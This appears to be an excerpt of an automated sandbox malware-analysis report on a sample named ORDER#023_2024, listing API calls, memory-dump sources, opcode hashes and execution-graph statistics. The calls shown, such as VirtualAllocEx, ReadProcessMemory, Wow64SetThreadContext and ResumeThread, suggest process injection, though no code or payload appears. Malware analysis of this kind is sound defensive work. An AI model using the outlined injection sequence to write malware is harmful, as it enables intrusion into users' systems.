                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06F56640
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            • Opcode ID: 16763782e647d8d94258b38564f04374ed097c6715bc434f3fc34b9ee59d3288
                                                                                            • Instruction ID: e853ebadd4d6873031c64a39b0e7beebe149b377554789600d6f25cffed5ac9c
                                                                                            • Opcode Fuzzy Hash: 16763782e647d8d94258b38564f04374ed097c6715bc434f3fc34b9ee59d3288
                                                                                            • Instruction Fuzzy Hash: 842116B1C003599FCB10DFAAC881AEEFBF5FF48320F50842AE959A7250D7349944CBA4
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F55F7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            • Opcode ID: 7444a6f2692f100a7b025680bd1081df10a16189c3fafb4cdcd833d896439b4f
                                                                                            • Instruction ID: 249ba07c513f84d6be60c185daeb046ad389312ebedcb18b186353e262601958
                                                                                            • Opcode Fuzzy Hash: 7444a6f2692f100a7b025680bd1081df10a16189c3fafb4cdcd833d896439b4f
                                                                                            • Instruction Fuzzy Hash: B62107B1D002098FDB10DFAAC4857EEBBF4AB49324F148429D959A7240D778A945CFA5
                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06F56640
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            • Opcode ID: 0fea3dc88e5079533117c520d60be0ab50279f3154ce1de406e269d26a473ccf
                                                                                            • Instruction ID: 8e935666e5ebf13a25a0893da4168c276326c699d2588b1539077c0c32181e0e
                                                                                            • Opcode Fuzzy Hash: 0fea3dc88e5079533117c520d60be0ab50279f3154ce1de406e269d26a473ccf
                                                                                            • Instruction Fuzzy Hash: 712116B1C003599FCB10DFAAC881AEEFBF5FF48320F50842AE958A7250D7349944CBA4
                                                                                            APIs
                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06F5647E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 3ba52bef306f01a60dee1421c9840207b6b5c99e9c0d31f382c365d889076207
                                                                                            • Instruction ID: 596de87de6cc360ca18be07c5c83dd1012151e1582cf13e27e6f92ec8f278e8b
                                                                                            • Opcode Fuzzy Hash: 3ba52bef306f01a60dee1421c9840207b6b5c99e9c0d31f382c365d889076207
                                                                                            • Instruction Fuzzy Hash: 091159B28002499FCB10DFA9C844BDEFFF5EF88324F148419E559A7250C739A940CFA4
                                                                                            APIs
                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06F5647E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 150b7b52bbcb1526142c1cecabfe44b6f874ccfe604890a19ffcc99e09d81421
                                                                                            • Instruction ID: 17b1458e4fd6a839508c5746a9109dbd7746f56a68023ef90a2374c6bccf0b2c
                                                                                            • Opcode Fuzzy Hash: 150b7b52bbcb1526142c1cecabfe44b6f874ccfe604890a19ffcc99e09d81421
                                                                                            • Instruction Fuzzy Hash: 611137719002499FCB10DFAAC844BEEFFF5EF88324F108419E959A7250C775A944CFA4
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ResumeThread
                                                                                            • String ID:
                                                                                            • API String ID: 947044025-0
                                                                                            • Opcode ID: 0a4afeb15551ab8e8668f05949f1801948881896ac11e86b515ad9e5980b3c80
                                                                                            • Instruction ID: aedad9c37be67ff4dd278e7e2011bc22dd198f35c4805386b0e5a15f2ddf5137
                                                                                            • Opcode Fuzzy Hash: 0a4afeb15551ab8e8668f05949f1801948881896ac11e86b515ad9e5980b3c80
                                                                                            • Instruction Fuzzy Hash: A31128B1D002498FCB10DFAAC4447EEFBF5EF88324F208429D559A7250C735A945CF95
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ResumeThread
                                                                                            • String ID:
                                                                                            • API String ID: 947044025-0
                                                                                            • Opcode ID: f5157abdde72536d5b6d5b6a3297e854d799c12796903b3d0cffed458a415578
                                                                                            • Instruction ID: 34fea6d52e54baf33e90716fc8907757deac891fb4ebe76e4ec1573fbfde4c20
                                                                                            • Opcode Fuzzy Hash: f5157abdde72536d5b6d5b6a3297e854d799c12796903b3d0cffed458a415578
                                                                                            • Instruction Fuzzy Hash: D41125B1D042488BCB20DFAAC4457EEFBF5AB88324F208429D559A7250CA75A944CFA4
                                                                                            APIs
                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F593CD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePost
                                                                                            • String ID:
                                                                                            • API String ID: 410705778-0
                                                                                            • Opcode ID: 52388954438dbdcca50a6dc39192545a1e9e400eeb94eab9eda214cd4d05ec41
                                                                                            • Instruction ID: 5dc32fb532e66fa0c931eaaf2ad22838cd7b9e31c5321283aabcac70ccc5a05d
                                                                                            • Opcode Fuzzy Hash: 52388954438dbdcca50a6dc39192545a1e9e400eeb94eab9eda214cd4d05ec41
                                                                                            • Instruction Fuzzy Hash: 2211C2B5800349DFDB10DF9AD885BDEFBF8EB48324F108419E958A7250D375A984CFA5
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 02A3B326
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1679254348.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2a30000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 2d2dccef9c23b5f6bbacc1d422c49b1a4ae5f82f15a721d8e9870d8e5ac88f90
                                                                                            • Instruction ID: 35a5f77ef6fb5c39354110f5723c130ff82389524f8639a6b27f873d014a876e
                                                                                            • Opcode Fuzzy Hash: 2d2dccef9c23b5f6bbacc1d422c49b1a4ae5f82f15a721d8e9870d8e5ac88f90
                                                                                            • Instruction Fuzzy Hash: 25113FB1C003488FCB10CF9AD444ADEFBF4EF88228F10886AD828A7600C374A545CFA0
                                                                                            APIs
                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F593CD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePost
                                                                                            • String ID:
                                                                                            • API String ID: 410705778-0
                                                                                            • Opcode ID: 2eb14208eb2048a628fe303d7a3381b3f0ea7a4ff6db92d23d5e84d38bad11b4
                                                                                            • Instruction ID: 89ad669bf1e35d0bde9f06891d16f6f724a1fe6f81d44a735e8eb5cd07f18067
                                                                                            • Opcode Fuzzy Hash: 2eb14208eb2048a628fe303d7a3381b3f0ea7a4ff6db92d23d5e84d38bad11b4
                                                                                            • Instruction Fuzzy Hash: 551106B5800348DFDB10DF9AD485BDEFBF8EB48320F108459E959A7240D375A944CFA5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1678691534.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_edd000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9529ba93be08481d7d2715b40dea968a9bc71c0957333ec6272c2e221d17882f
                                                                                            • Instruction ID: 51d6c59938096d9feedc563a9ecb8e70fe9a350cb9b2069e8e2bccca3442e71e
                                                                                            • Opcode Fuzzy Hash: 9529ba93be08481d7d2715b40dea968a9bc71c0957333ec6272c2e221d17882f
                                                                                            • Instruction Fuzzy Hash: C1210371548240DFCB05DF14EDC0B26BF65FB98318F20C56AE8095B356C336D856CBA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1678748444.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_eed000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 734b9d408614d1fddfd1a57f6ece971b701fee05ff99768fdb18c7953da918c4
                                                                                            • Instruction ID: dbff7f59790b7ba3318195a77e1d214506318c392e1d8c79f67f5b70defdcd13
                                                                                            • Opcode Fuzzy Hash: 734b9d408614d1fddfd1a57f6ece971b701fee05ff99768fdb18c7953da918c4
                                                                                            • Instruction Fuzzy Hash: 5F210471608288DFCB14DF15D9C4B26BFA6FB84318F28C56DD80A5B296C33BD847CA61
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1678748444.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_eed000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5403cc0109cf9fe312c69abdec7f9b4041acce8d6bc0b3dcd34f0a5f189947a7
                                                                                            • Instruction ID: 9a659ae817d2aec47678287fce642f6845f0a84cc3b86a0c5e75b23106be9ac7
                                                                                            • Opcode Fuzzy Hash: 5403cc0109cf9fe312c69abdec7f9b4041acce8d6bc0b3dcd34f0a5f189947a7
                                                                                            • Instruction Fuzzy Hash: C42141755093C48FDB12CF24D994715BF72EB46214F28C5EAD8498B6A7C33A980ACB62
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1678691534.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_edd000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                            • Instruction ID: e96ca613347104f0728a7c746d39f5bcc5071eb778b5da9b9f82332ba3f393ee
                                                                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                            • Instruction Fuzzy Hash: DE11D376504280DFCB16CF14E9C4B16BF71FB94328F24C6AAD8494B756C336D85ACBA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1678691534.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_edd000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4dacdb2f62d5e6a96cb6ad7bcb7f1c3d417f2091a3c147b717cd9bf1b5871cc1
                                                                                            • Instruction ID: 3ca8a72e980e5e14aaf552f09c1f87a121acde17e44a333c8f8819745e20e8e8
                                                                                            • Opcode Fuzzy Hash: 4dacdb2f62d5e6a96cb6ad7bcb7f1c3d417f2091a3c147b717cd9bf1b5871cc1
                                                                                            • Instruction Fuzzy Hash: 4A01A77100D3449AE7104A25CD847A7FF98EF45328F18D5ABED095E396C279DC45C6B1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1678691534.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_edd000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8ba7105b72ae69ac2b35a7af09b1c8765fbca93ef9058f669d8fe4cc5da4066c
                                                                                            • Instruction ID: dd95920e0d7c763fcbaa545fae3e0e1175786cf9e763808646f421962c93a5a5
                                                                                            • Opcode Fuzzy Hash: 8ba7105b72ae69ac2b35a7af09b1c8765fbca93ef9058f669d8fe4cc5da4066c
                                                                                            • Instruction Fuzzy Hash: 1CF0C2710083449AE7108A16CC84B62FFA8EF95338F18C45BED081E282C2799C44CAB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 13a2f1e71d730dfd0b8125ecfbace6fbe2b409b595ac74e24204016684a10c78
                                                                                            • Instruction ID: 4214049e28dd10c2c4f44bc5042467e1bd0b3ac1c7d6cbbd79f6306244ddcf71
                                                                                            • Opcode Fuzzy Hash: 13a2f1e71d730dfd0b8125ecfbace6fbe2b409b595ac74e24204016684a10c78
                                                                                            • Instruction Fuzzy Hash: 8FD1BB30B016108FDB69DB79C950BAEB7F7AF89300F154569D68A8B2A1DF39EC01CB51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 77771f2b63735fa7a7e3a86a2013038dd7e7f51303228b112cd9e841a3dd9529
                                                                                            • Instruction ID: fe8654b03dbefb077a8a45b7ec934f7e7bbd05a416cf7d853404e834e78a1f22
                                                                                            • Opcode Fuzzy Hash: 77771f2b63735fa7a7e3a86a2013038dd7e7f51303228b112cd9e841a3dd9529
                                                                                            • Instruction Fuzzy Hash: 37E1FA74E001198FCB54DF99C5819AEFBF2BF89304F249159E915AB356DB30AD81CF60
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cd24f2807e040d511ade49d7dd21b68e78dfd0edb0152d5cd57f5a65b94e623e
                                                                                            • Instruction ID: d0f6c35720846ee40c7555d5846ec3e73273ad5aedd6b29524a1c85930e8e7a0
                                                                                            • Opcode Fuzzy Hash: cd24f2807e040d511ade49d7dd21b68e78dfd0edb0152d5cd57f5a65b94e623e
                                                                                            • Instruction Fuzzy Hash: 5DE10974E001198FCB14DFA9C5819AEFBB2BF89305F248169D914AB35ADB30AD41CFA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 15e21ddf4da697688da388d220f14f5c5520d8b4abbd501a5086892115f78608
                                                                                            • Instruction ID: a3d16ff2406f3f3b606ccb303d7efcb19298703be7196e0cb27f92c15ce41bc9
                                                                                            • Opcode Fuzzy Hash: 15e21ddf4da697688da388d220f14f5c5520d8b4abbd501a5086892115f78608
                                                                                            • Instruction Fuzzy Hash: 73E1F974E001198FDB54DFA9C5819AEFBB2FF89304F249169E914AB356DB30AD41CFA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 57df6db912c2b7f7b266f0b9929fc1d1f4f2d4cb613b3d7a91db9355a4fd2a86
                                                                                            • Instruction ID: 6bfbfc68bbedfc0a89ee62054cb58ff4684631b35b3db7738b28545dede72aa5
                                                                                            • Opcode Fuzzy Hash: 57df6db912c2b7f7b266f0b9929fc1d1f4f2d4cb613b3d7a91db9355a4fd2a86
                                                                                            • Instruction Fuzzy Hash: D3E10AB5E041198FCB14DFA9C5819AEFBF2BF89304F248169D914AB35ADB30AD41CF61
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 74098ee4919b90d5b204ea1dd666be68df1fdb2af2e34326a3d65d557021ef4d
                                                                                            • Instruction ID: d4ebe75b92541e2abd661b8e0c6cb4bae2cca36ef62169de3563f9e324339f43
                                                                                            • Opcode Fuzzy Hash: 74098ee4919b90d5b204ea1dd666be68df1fdb2af2e34326a3d65d557021ef4d
                                                                                            • Instruction Fuzzy Hash: F1E1F675E001198FCB14DFA9C5819AEFBF2BF89304F248169E914AB356DB30AD41CFA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1679254348.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2a30000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0462605c91b6437f2267fc2d12ad302daf9fe2c121351de9ea6299c34f7dfa57
                                                                                            • Instruction ID: 88794095fc0d7c84c2a09a7c635775f589aaac856b77f462821161d30bec9e77
                                                                                            • Opcode Fuzzy Hash: 0462605c91b6437f2267fc2d12ad302daf9fe2c121351de9ea6299c34f7dfa57
                                                                                            • Instruction Fuzzy Hash: 87A16932E10615CFCF16DFA4C98059EB7B2BF84304B25856AF906EB265DF71E916CB80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9df1f6ee49d83907c4c97c35eaa175b9f1670cef71b54ee4d50941bdd25f088a
                                                                                            • Instruction ID: 5f10d0237461cca8e74d314b4d98a89470b184ed03e8a119616868cbd108e8dd
                                                                                            • Opcode Fuzzy Hash: 9df1f6ee49d83907c4c97c35eaa175b9f1670cef71b54ee4d50941bdd25f088a
                                                                                            • Instruction Fuzzy Hash: 6A510874E002198FDB14CFA9C9815AEFBF2BF89304F249169D918A7356DB31AD41CFA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:

                                                                                            Execution Graph

                                                                                            Execution Coverage:8.8%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:73
                                                                                            Total number of Limit Nodes:9

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 014CBD16
                                                                                            • GetCurrentThread.KERNEL32 ref: 014CBD53
                                                                                            • GetCurrentProcess.KERNEL32 ref: 014CBD90
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 014CBDE9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2904709160.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_14c0000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 014CBD16
                                                                                            • GetCurrentThread.KERNEL32 ref: 014CBD53
                                                                                            • GetCurrentProcess.KERNEL32 ref: 014CBD90
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 014CBDE9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2904709160.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_14c0000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2908556333.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_6840000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            APIs
                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 067F2231
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2908313317.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_67f0000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallProcWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2714655100-0
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014CC04F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2904709160.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_14c0000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014CC04F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2904709160.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_14c0000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            APIs
                                                                                            • GlobalMemoryStatusEx.KERNELBASE ref: 06843EEF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2908556333.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_6840000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: GlobalMemoryStatus
                                                                                            • String ID:
                                                                                            • API String ID: 1890195054-0
                                                                                            APIs
                                                                                            • OleInitialize.OLE32(00000000), ref: 067F54C5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2908313317.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_67f0000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Initialize
                                                                                            • String ID:
                                                                                            • API String ID: 2538663250-0
                                                                                            APIs
                                                                                            • OleInitialize.OLE32(00000000), ref: 067F54C5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2908313317.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_67f0000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Initialize
                                                                                            • String ID:
                                                                                            • API String ID: 2538663250-0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2904504962.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_147d000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2904504962.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_147d000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
